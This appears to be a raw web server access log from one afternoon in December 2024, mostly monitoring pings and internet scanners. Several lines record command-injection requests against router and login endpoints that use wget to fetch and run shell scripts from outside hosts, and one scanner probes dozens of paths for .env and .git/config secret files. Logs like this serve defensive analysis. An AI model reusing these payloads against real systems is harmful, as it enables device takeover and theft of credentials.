212.91.246.72 - - [02/Dec/2024:13:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:13:55:09 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:13:55:49 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
78.153.140.151 - - [02/Dec/2024:13:56:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Dec/2024:13:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:56:43 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:56:43 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:56:45 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:56:45 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:56:47 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:56:47 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:57:11 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:57:11 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:57:13 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:57:14 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:57:16 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:13:57:16 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
212.91.246.72 - - [02/Dec/2024:13:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:00:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:01:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:02:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:03:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "GET /config/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "GET /project/.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:04:16 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:04:17 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:04:17 +0100] "GET /.env.preprod HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
212.91.246.72 - - [02/Dec/2024:14:04:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:14:04:40 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [02/Dec/2024:14:05:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.228.214.184 - - [02/Dec/2024:14:06:09 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [02/Dec/2024:14:06:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:07:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:08:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:14:08:50 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [02/Dec/2024:14:09:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:14:09:35 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
76.11.185.195 - - [02/Dec/2024:14:10:23 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [02/Dec/2024:14:10:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.20 - - [02/Dec/2024:14:11:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [02/Dec/2024:14:11:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.151 - - [02/Dec/2024:14:11:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:38.0; Neustar WPM) Gecko/20100101 Firefox/38.0"
78.153.140.151 - - [02/Dec/2024:14:11:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.151 - - [02/Dec/2024:14:11:51 +0100] "GET /default/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13"
78.153.140.151 - - [02/Dec/2024:14:11:51 +0100] "GET /delivery/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:52 +0100] "GET /dependencies/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-N920P Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:52 +0100] "GET /deploy/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:52 +0100] "GET /deployment/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7"
78.153.140.151 - - [02/Dec/2024:14:11:53 +0100] "GET /developerslv/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.1.0) Gecko/20100101 Firefox/50.1.0"
78.153.140.151 - - [02/Dec/2024:14:11:53 +0100] "GET /directories/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:53 +0100] "GET /django/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0 Cyberfox/28.0.1"
78.153.140.151 - - [02/Dec/2024:14:11:54 +0100] "GET /downloads/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; U; Android 4.4.3; en-us; KFTHWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:54 +0100] "GET /nginx/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67"
78.153.140.151 - - [02/Dec/2024:14:11:54 +0100] "GET /robots/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; LG-MS770 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher"
78.153.140.151 - - [02/Dec/2024:14:11:54 +0100] "GET /sample.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
78.153.140.151 - - [02/Dec/2024:14:11:54 +0100] "GET /search/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 OPR/16.0.1196.73"
78.153.140.151 - - [02/Dec/2024:14:11:56 +0100] "GET /sources/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:56 +0100] "GET /twilio.env HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/7.0; .NET4.0C; .NET4.0E)"
78.153.140.151 - - [02/Dec/2024:14:11:56 +0100] "GET /user/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:11:57 +0100] "GET /phpinfo/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0"
78.153.140.151 - - [02/Dec/2024:14:11:57 +0100] "GET /pictures/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Safari/601.6.17"
78.153.140.151 - - [02/Dec/2024:14:11:58 +0100] "GET /option/.env HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]"
78.153.140.151 - - [02/Dec/2024:14:11:59 +0100] "GET /options/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) FxiOS/5.3 Mobile/14B100 Safari/602.2.14"
78.153.140.151 - - [02/Dec/2024:14:11:59 +0100] "GET /portal/.env HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.4.10-4GB i686) Opera 6.11 [en]"
78.153.140.151 - - [02/Dec/2024:14:11:59 +0100] "GET /route/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
78.153.140.151 - - [02/Dec/2024:14:12:00 +0100] "GET /routes/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.50"
78.153.140.151 - - [02/Dec/2024:14:12:01 +0100] "GET /office/.env HTTP/1.1" 404 316 "-" "Opera/8.51 (Macintosh; PPC Mac OS X; U; de)"
78.153.140.151 - - [02/Dec/2024:14:12:01 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /upfiles/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /view/.env HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 1.1.4322; Alexa Toolbar)"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /views/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070226 Firefox/2.0.0.2"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /security/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.363.0 Safari/533.3"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /samples/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-P3113 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /sandbox/.env HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.153.140.151 - - [02/Dec/2024:14:12:02 +0100] "GET /results/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) FxiOS/5.3 Mobile/13G36 Safari/601.1.46"
78.153.140.151 - - [02/Dec/2024:14:12:03 +0100] "GET /process/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31"
78.153.140.151 - - [02/Dec/2024:14:12:03 +0100] "GET /products/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36"
78.153.140.151 - - [02/Dec/2024:14:12:04 +0100] "GET /project/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.1; A1601 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Mobile Safari/537.36 OPR/37.0.2192.110486"
78.153.140.151 - - [02/Dec/2024:14:12:04 +0100] "GET /import/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11"
78.153.140.151 - - [02/Dec/2024:14:12:04 +0100] "GET /include/.env HTTP/1.1" 404 317 "-" "Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16"
78.153.140.151 - - [02/Dec/2024:14:12:05 +0100] "GET /install/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.39"
78.153.140.151 - - [02/Dec/2024:14:12:05 +0100] "GET /resources/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; LCJB; rv:11.0) like Gecko"
212.91.246.72 - - [02/Dec/2024:14:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [02/Dec/2024:14:12:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Dec/2024:14:13:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:14:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:14:14:42 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:14:15:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:16:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:17:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.20 - - [02/Dec/2024:14:18:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [02/Dec/2024:14:18:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:19:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:20:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:21:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [02/Dec/2024:14:22:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Dec/2024:14:22:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:23:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:24:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:25:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [02/Dec/2024:14:25:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.220.1.88 - - [02/Dec/2024:14:25:58 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:14:26:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:27:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:28:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:14:28:35 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
162.142.125.220 - - [02/Dec/2024:14:28:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.220 - - [02/Dec/2024:14:28:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.220 - - [02/Dec/2024:14:28:56 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Dec/2024:14:29:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:30:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.20 - - [02/Dec/2024:14:31:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [02/Dec/2024:14:31:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:32:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:14:33:07 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
168.205.209.72 - - [02/Dec/2024:14:33:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:14:33:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.20 - - [02/Dec/2024:14:33:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [02/Dec/2024:14:34:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:14:35:06 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [02/Dec/2024:14:35:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [02/Dec/2024:14:36:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.117.18.65 - - [02/Dec/2024:14:36:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [02/Dec/2024:14:36:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [02/Dec/2024:14:36:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
114.35.26.241 - - [02/Dec/2024:14:37:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [02/Dec/2024:14:37:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:38:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
